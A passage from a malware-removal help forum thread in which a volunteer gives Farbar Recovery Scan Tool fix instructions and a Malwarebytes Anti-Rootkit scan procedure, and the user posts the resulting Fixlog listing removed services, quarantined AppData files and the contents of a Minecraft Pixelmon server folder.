S3 VBAudioVMVAIOMME; system32\DRIVERS\vbaudio_vmvaio64_win7.sys
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne5ae3db1246d235a
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign343e9ec52f7fd552
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign1efa06de796e8ad3
2017-12-28 02:22 - 2017-12-28 02:22 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifyt.txt
2017-12-28 02:08 - 2017-12-28 02:22 - 000001757 _____ C:\Users\Sblck\AppData\Local\x
2017-12-28 02:08 - 2017-12-28 02:08 - 000938008 _____ C:\Users\Sblck\AppData\Local\WindowsCodecsRaw.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.vbs
2017-12-28 02:08 - 2017-12-28 02:08 - 000002584 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001760 _____ C:\Users\Sblck\AppData\Local\xx
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XXML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000000029 _____ C:\Users\Sblck\AppData\Local\MCconfig.dll
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignd7f7090ca4ac1881
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign513d5e68afbe06ff
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf275cfd24f8abf8f
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignaa3ebf02045ed3f4
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign71de186bca50890b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign62e729e85932ae9b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign36feac13f8ae187b
2017-12-20 23:19 - 2017-12-20 23:19 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign8eda57a023064a99
2017-12-20 23:16 - 2017-12-20 23:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign14ad0f9f816f04c3
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne30d82309317b6ee
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigna8e6c9e33f3e5864
2017-12-07 19:35 - 2017-12-07 19:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign7266a15b525aa838
2017-12-07 19:34 - 2017-12-07 19:34 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign0000f4ed20649afa
2017-12-16 20:38 - 2016-09-28 20:29 - 000000000 _____ C:\Windows\SysWOW64\Access.dat
2017-01-15 22:50 - 2017-01-15 22:50 - 000000001 _____ () C:\Users\Sblck\AppData\Roaming\EDCSSU
2008-02-05 13:28 - 2008-02-05 13:28 - 000000051 _____ () C:\Users\Sblck\AppData\Local\setup.txt
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
Folder: C:\Antonio PIXELMON SV
emptytemp:
End::
  • Click Fix
  • When completed he tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

Malwarebytes Anti-Rootkit - Scan Only

--------------------
  • Download Malwarebytes Anti-Rootkit and save it to your desktop
  • Right click the mbar icon and select Run as administrator
  • Click OK to install it on your desktop
  • Click Next on the following screen
  • On the Update Database: screen click Update to download the latest definition updates then click Next
  • On the Scan System: screen place checkmarks in the Drivers, Sectors, and System boxes (should be checked by default) then click Scan. Please be patient and allow the process to complete
  • Click the Exit button not Cleanup
  • A system-log report will be created in the mbar folder, please copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • system-log report

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#13 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 10:03 PM

The fixlog as requested :
 

Fix result of Farbar Recovery Scan Tool (x64) Version: 26-12-2017
Ran by Sblck (29-12-2017 02:40:56) Run:1
Running from F:\Desktop\DesktopC
Loaded Profiles: Sblck (Available Profiles: Sblck)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
R3 ALSysIO; \??\C:\Users\Sblck\AppData\Local\Temp\ALSysIO64.sys 
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys
S3 GLCKIO; \??\C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\9\INTEL3~1\690b33e1-0462-4e84-9bea-c7552b45432a.sys
S3 PORTMON; \??\C:\Users\Sblck\Desktop\SysinternalsSuite\PORTMSYS.SYS
S3 VBAudioVACAMME; system32\DRIVERS\vbaudio_cablea64_win7.sys
S3 VBAudioVACBMME; system32\DRIVERS\vbaudio_cableb64_win7.sys
S3 VBAudioVMVAIOMME; system32\DRIVERS\vbaudio_vmvaio64_win7.sys
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne5ae3db1246d235a
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign343e9ec52f7fd552
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign1efa06de796e8ad3
2017-12-28 02:22 - 2017-12-28 02:22 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifyt.txt
2017-12-28 02:08 - 2017-12-28 02:22 - 000001757 _____ C:\Users\Sblck\AppData\Local\x
2017-12-28 02:08 - 2017-12-28 02:08 - 000938008 _____ C:\Users\Sblck\AppData\Local\WindowsCodecsRaw.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.vbs
2017-12-28 02:08 - 2017-12-28 02:08 - 000002584 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001760 _____ C:\Users\Sblck\AppData\Local\xx
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XXML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000000029 _____ C:\Users\Sblck\AppData\Local\MCconfig.dll
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignd7f7090ca4ac1881
2017-12-21 01:14 - 2017-12-21 01:14 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign513d5e68afbe06ff
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignf275cfd24f8abf8f
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsignaa3ebf02045ed3f4
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign71de186bca50890b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign62e729e85932ae9b
2017-12-21 01:13 - 2017-12-21 01:13 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign36feac13f8ae187b
2017-12-20 23:19 - 2017-12-20 23:19 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign8eda57a023064a99
2017-12-20 23:16 - 2017-12-20 23:16 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign14ad0f9f816f04c3
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne30d82309317b6ee
2017-12-20 17:59 - 2017-12-20 17:59 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigna8e6c9e33f3e5864
2017-12-07 19:35 - 2017-12-07 19:35 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign7266a15b525aa838
2017-12-07 19:34 - 2017-12-07 19:34 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign0000f4ed20649afa
2017-12-16 20:38 - 2016-09-28 20:29 - 000000000 _____ C:\Windows\SysWOW64\Access.dat
2017-01-15 22:50 - 2017-01-15 22:50 - 000000001 _____ () C:\Users\Sblck\AppData\Roaming\EDCSSU
2008-02-05 13:28 - 2008-02-05 13:28 - 000000051 _____ () C:\Users\Sblck\AppData\Local\setup.txt
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
Folder: C:\Antonio PIXELMON SV
emptytemp:
 
*****************
 
Restore point was successfully created.
Processes closed successfully.
ALSysIO => Service stopped successfully.
"HKLM\System\CurrentControlSet\Services\ALSysIO" => removed successfully
ALSysIO => service removed successfully
"HKLM\System\CurrentControlSet\Services\BRDriver64_1_3_3_E02B25FC" => removed successfully
BRDriver64_1_3_3_E02B25FC => service removed successfully
"HKLM\System\CurrentControlSet\Services\GLCKIO" => removed successfully
GLCKIO => service removed successfully
"HKLM\System\CurrentControlSet\Services\PORTMON" => removed successfully
PORTMON => service removed successfully
"HKLM\System\CurrentControlSet\Services\VBAudioVACAMME" => removed successfully
VBAudioVACAMME => service removed successfully
"HKLM\System\CurrentControlSet\Services\VBAudioVACBMME" => removed successfully
VBAudioVACBMME => service removed successfully
"HKLM\System\CurrentControlSet\Services\VBAudioVMVAIOMME" => removed successfully
VBAudioVMVAIOMME => service removed successfully
"HKLM\System\CurrentControlSet\Services\vmci" => removed successfully
vmci => service removed successfully
"HKLM\System\CurrentControlSet\Services\VMnetAdapter" => removed successfully
VMnetAdapter => service removed successfully
C:\Users\Sblck\AppData\Local\Tempzxpsigne5ae3db1246d235a => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign343e9ec52f7fd552 => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign1efa06de796e8ad3 => moved successfully
C:\Users\Sblck\AppData\Local\AppVShNotifyt.txt => moved successfully
C:\Users\Sblck\AppData\Local\x => moved successfully
C:\Users\Sblck\AppData\Local\WindowsCodecsRaw.txt => moved successfully
C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.vbs => moved successfully
C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.txt => moved successfully
C:\Users\Sblck\AppData\Local\xx => moved successfully
C:\Users\Sblck\AppData\Local\XXML.txt => moved successfully
C:\Users\Sblck\AppData\Local\XML.txt => moved successfully
C:\Users\Sblck\AppData\Local\MCconfig.dll => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsignd7f7090ca4ac1881 => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign513d5e68afbe06ff => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsignf275cfd24f8abf8f => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsignaa3ebf02045ed3f4 => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign71de186bca50890b => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign62e729e85932ae9b => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign36feac13f8ae187b => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign8eda57a023064a99 => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign14ad0f9f816f04c3 => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsigne30d82309317b6ee => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsigna8e6c9e33f3e5864 => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign7266a15b525aa838 => moved successfully
C:\Users\Sblck\AppData\Local\Tempzxpsign0000f4ed20649afa => moved successfully
C:\Windows\SysWOW64\Access.dat => moved successfully
C:\Users\Sblck\AppData\Roaming\EDCSSU => moved successfully
C:\Users\Sblck\AppData\Local\setup.txt => moved successfully
C:\Windows\SysWOW64\zlib.dll => ":DocumentSummaryInformation" ADS could not remove.
C:\Windows\SysWOW64\zlib.dll => ":SummaryInformation" ADS could not remove.
C:\Windows\SysWOW64\zlib.dll => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
 
========================= Folder: C:\Antonio PIXELMON SV ========================
 
2016-11-21 22:29 - 2017-12-04 18:46 - 000000002 ____A [D751713988987E9331980363E24189CE] () C:\Antonio PIXELMON SV\banned-ips.json
2016-11-21 22:29 - 2017-12-04 18:46 - 000000002 ____A [D751713988987E9331980363E24189CE] () C:\Antonio PIXELMON SV\banned-players.json
2016-11-21 19:28 - 2016-11-21 19:29 - 000000183 ____A [CFEE70BD2D8F7339B9F49301BC010F5E] () C:\Antonio PIXELMON SV\eula.txt
2016-11-21 19:31 - 2016-11-21 19:31 - 009459897 ____A [41C4E081DEFD80B09CB0391C894C2F3C] () C:\Antonio PIXELMON SV\minecraft_server.1.10.2.jar
2016-11-21 19:31 - 2016-11-21 19:31 - 004160209 ____A [EE0529F4917449654A23ACDE2CB5D2DF] () C:\Antonio PIXELMON SV\minesvforge.jar
2016-11-21 22:29 - 2017-12-04 18:46 - 000000401 ____A [663F40E473CC8CF52F5AB9048136343E] () C:\Antonio PIXELMON SV\ops.json
2016-11-21 19:33 - 2016-11-21 19:29 - 320192085 ____A [C8E66F3A6D08798CA8CFB9B49FA69638] () C:\Antonio PIXELMON SV\Pixelmon-1.10.2-5.0.0-beta12-universal.jar.bak
2016-11-21 22:07 - 2016-11-26 21:40 - 000000343 ____A [229FA853E9907024C4F9ECF88E42DFFA] () C:\Antonio PIXELMON SV\server start.bat
2016-11-21 19:28 - 2016-11-21 19:28 - 009459897 ____A [41C4E081DEFD80B09CB0391C894C2F3C] () C:\Antonio PIXELMON SV\server.jar
2017-12-03 21:11 - 2017-12-04 18:46 - 000000811 ____A [955D9E6D2031C5564DDCBD9D711C2E9B] () C:\Antonio PIXELMON SV\server.properties
2016-11-21 22:29 - 2017-09-24 21:59 - 000000825 ____A [5CD349169AEA3EE6C9CAB708E239D802] () C:\Antonio PIXELMON SV\server.propertiesPIX
2016-11-21 22:29 - 2017-12-04 21:03 - 000000316 ____A [BEB004A7572AE0241F524589822783A9] () C:\Antonio PIXELMON SV\usercache.json
2016-11-21 22:45 - 2016-11-21 23:14 - 000000109 ____A [5189C05F93D6B1669B61F33ACB4C39DB] () C:\Antonio PIXELMON SV\usernamecache.json
2016-11-21 22:29 - 2016-11-21 22:29 - 000000002 ____A [D751713988987E9331980363E24189CE] () C:\Antonio PIXELMON SV\whitelist.json
2017-12-03 21:12 - 2017-12-03 21:13 - 192643111 ____A [5E710473961C01A65C023B44D0E98DAA] () C:\Antonio PIXELMON SV\worldPixelmon.rar
2017-12-03 23:50 - 2017-12-03 23:54 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000000
2017-12-03 23:52 - 2017-12-03 23:52 - 000000004 ____A [37A6259CC0C1DAE299A7866489DFF0BD] () C:\Antonio PIXELMON SV\##world.UNDO##\00000000\##MCEDIT.REVINFO##
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000000\data
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000000\playerdata
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000000\region
2017-12-03 23:52 - 2017-12-03 23:52 - 000016384 ____A [A2D26C0AFADDD2617FD139C34EEFEAA2] () C:\Antonio PIXELMON SV\##world.UNDO##\00000000\region\r.0.0.mca
2017-12-03 23:52 - 2017-12-03 23:52 - 000077824 ____A [910D3DCC19CD1759206AE50F946840AF] () C:\Antonio PIXELMON SV\##world.UNDO##\00000000\region\r.-2.-1.mca
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000001
2017-12-03 23:52 - 2017-12-03 23:52 - 000000004 ____A [37A6259CC0C1DAE299A7866489DFF0BD] () C:\Antonio PIXELMON SV\##world.UNDO##\00000001\##MCEDIT.REVINFO##
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000001\data
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000001\playerdata
2017-12-03 23:52 - 2017-12-03 23:52 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000001\region
2017-12-03 23:52 - 2017-12-03 23:52 - 000016384 ____A [7A7BA7FEA3D6D92A9A896F9E055C3CAB] () C:\Antonio PIXELMON SV\##world.UNDO##\00000001\region\r.0.0.mca
2017-12-03 23:52 - 2017-12-03 23:52 - 000073728 ____A [205CB144E60E7ABAE14CD9697AE3EC7D] () C:\Antonio PIXELMON SV\##world.UNDO##\00000001\region\r.-2.-1.mca
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000002
2017-12-03 23:53 - 2017-12-03 23:53 - 000000004 ____A [37A6259CC0C1DAE299A7866489DFF0BD] () C:\Antonio PIXELMON SV\##world.UNDO##\00000002\##MCEDIT.REVINFO##
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000002\data
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000002\playerdata
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000002\region
2017-12-03 23:53 - 2017-12-03 23:53 - 000016384 ____A [124FDAF82693ECC54A936015EA947878] () C:\Antonio PIXELMON SV\##world.UNDO##\00000002\region\r.0.0.mca
2017-12-03 23:53 - 2017-12-03 23:53 - 000098304 ____A [1F9D2B973A217B42C6ADA51887C46455] () C:\Antonio PIXELMON SV\##world.UNDO##\00000002\region\r.-2.-1.mca
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000003
2017-12-03 23:53 - 2017-12-03 23:53 - 000000004 ____A [37A6259CC0C1DAE299A7866489DFF0BD] () C:\Antonio PIXELMON SV\##world.UNDO##\00000003\##MCEDIT.REVINFO##
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000003\data
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000003\region
2017-12-03 23:53 - 2017-12-03 23:53 - 000016384 ____A [1D47BCB1275D2204D24B4E5D2A0DEC44] () C:\Antonio PIXELMON SV\##world.UNDO##\00000003\region\r.0.0.mca
2017-12-03 23:53 - 2017-12-03 23:53 - 000110592 ____A [009A5D0E5482DCD62DFD7A4149DB5867] () C:\Antonio PIXELMON SV\##world.UNDO##\00000003\region\r.-2.-1.mca
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000004
2017-12-03 23:53 - 2017-12-03 23:53 - 000000004 ____A [37A6259CC0C1DAE299A7866489DFF0BD] () C:\Antonio PIXELMON SV\##world.UNDO##\00000004\##MCEDIT.REVINFO##
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000004\data
2017-12-03 23:53 - 2017-12-03 23:53 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000004\region
2017-12-03 23:53 - 2017-12-03 23:53 - 000016384 ____A [E7C0D068D4B03EBD3BA0696353AAF56D] () C:\Antonio PIXELMON SV\##world.UNDO##\00000004\region\r.0.0.mca
2017-12-03 23:53 - 2017-12-03 23:53 - 000081920 ____A [F95B044BD878A660863C16F6295FB9DF] () C:\Antonio PIXELMON SV\##world.UNDO##\00000004\region\r.-2.-1.mca
2017-12-03 23:54 - 2017-12-03 23:54 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000005
2017-12-03 23:54 - 2017-12-03 23:54 - 000000004 ____A [37A6259CC0C1DAE299A7866489DFF0BD] () C:\Antonio PIXELMON SV\##world.UNDO##\00000005\##MCEDIT.REVINFO##
2017-12-03 23:54 - 2017-12-03 23:54 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000005\data
2017-12-03 23:54 - 2017-12-03 23:54 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\##world.UNDO##\00000005\region
2017-12-03 23:54 - 2017-12-03 23:54 - 000057344 ____A [56A1568C66C090D440510D38404C9BDB] () C:\Antonio PIXELMON SV\##world.UNDO##\00000005\region\r.-2.-1.mca
2016-11-21 20:56 - 2016-11-21 20:56 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\bad md
2016-11-21 19:56 - 2016-11-21 19:56 - 000106941 ____A [1D879854A9164197440990E32910F551] () C:\Antonio PIXELMON SV\bad md\CodeChickenCore-1.10.2-2.3.5.93-universal.jar
2016-11-21 19:56 - 2016-11-21 19:56 - 000545089 ____A [B9094E2D483C0A1DD320CC50EB21D817] () C:\Antonio PIXELMON SV\bad md\NotEnoughItems-1.10.2-2.1.2.164-universal.jar
2016-11-21 19:32 - 2017-09-24 21:04 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\config
2016-11-21 22:07 - 2016-11-21 22:07 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\config\BetterFoliage.cfg
2016-11-21 19:32 - 2016-11-21 19:32 - 000002967 ____A [2231716BC02CD2C2994F6872D4B4BFFE] () C:\Antonio PIXELMON SV\config\forge.cfg
2016-11-21 19:32 - 2016-11-21 19:32 - 000002025 ____A [3CA5C1DB39AC108E8ABEAB74450A4F1D] () C:\Antonio PIXELMON SV\config\forgeChunkLoading.cfg
2016-11-21 22:07 - 2017-12-04 18:46 - 000000397 ____A [C038106EF87231F5E24D4B85A38B5922] () C:\Antonio PIXELMON SV\config\MoreFurnaces.cfg
2017-09-24 21:04 - 2017-09-24 21:04 - 000015997 ____A [42BA900C0BE080A57E44227CA255E829] () C:\Antonio PIXELMON SV\config\pixelmon.hocon
2016-11-21 22:07 - 2016-11-21 22:07 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\config\AleXndr
2016-11-21 22:07 - 2017-12-04 18:46 - 000018677 ____A [78D6397D19DA5A035AF273B56ADB57FF] () C:\Antonio PIXELMON SV\config\AleXndr\FusionSettings.xml
2016-11-21 22:07 - 2017-12-04 18:46 - 000013344 ____A [D060C583A04E7BD02CDDF3180D202035] () C:\Antonio PIXELMON SV\config\AleXndr\Netherrocks_Settings.xml
2016-11-21 22:07 - 2017-12-04 18:46 - 000001530 ____A [620FC4E72AF5D5480CC854ED26CE068A] () C:\Antonio PIXELMON SV\config\AleXndr\SimpleCoreAPI_Settings.xml
2016-11-21 22:07 - 2017-12-04 18:46 - 000011901 ____A [15F1F6DEB607A21156D863E0D1AC592D] () C:\Antonio PIXELMON SV\config\AleXndr\SimpleOres2_Settings.xml
2016-11-21 22:18 - 2016-11-21 22:35 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\crash-reports
2016-11-21 22:29 - 2016-11-21 22:29 - 000004021 ____A [3EBD0E75D68CEE21FF6586F1FBF54143] () C:\Antonio PIXELMON SV\crash-reports\crash-2016-11-21_22.29.57-server.txt
2016-11-21 22:35 - 2016-11-21 22:35 - 000004050 ____A [994A459F9DE95F03C1A7711A1755F482] () C:\Antonio PIXELMON SV\crash-reports\crash-2016-11-21_22.35.01-server.txt
2016-11-21 22:35 - 2016-11-21 22:35 - 000004015 ____A [ED92CF4BD6EBD034214C8FAA64064C66] () C:\Antonio PIXELMON SV\crash-reports\crash-2016-11-21_22.35.50-server.txt
2016-11-21 22:07 - 2017-09-24 21:04 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\database
2016-11-21 22:07 - 2016-11-21 22:07 - 000000000 ____A [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\database\h2-1.3.173.jar
2016-11-21 22:07 - 2017-09-24 21:04 - 004601856 ____A [6DA6CEEA51D6C8F91FABBAA06E4D81C8] () C:\Antonio PIXELMON SV\database\Pixelmon2.h2.db
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\com
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\com\typesafe
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\com\typesafe\akka
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\com\typesafe\akka\akka-actor_2.11
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\com\typesafe\akka\akka-actor_2.11\2.3.3
2016-11-21 19:31 - 2016-11-21 19:31 - 002553197 ____A [72553B9B2C93CCE5B6A0A02D4DCE9AC5] () C:\Antonio PIXELMON SV\libraries\com\typesafe\akka\akka-actor_2.11\2.3.3\akka-actor_2.11-2.3.3.jar
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\com\typesafe\config
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\com\typesafe\config\1.2.1
2016-11-21 19:31 - 2016-11-21 19:31 - 000221173 ____A [7CA00EE2DC5F594451BD5BF78330CAEB] () C:\Antonio PIXELMON SV\libraries\com\typesafe\config\1.2.1\config-1.2.1.jar
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\java3d
2016-11-21 19:31 - 2016-11-21 19:31 - 000000000 ____D [D41D8CD98F00B204E9800998ECF8427E] () C:\Antonio PIXELMON SV\libraries\java3d\vecmath
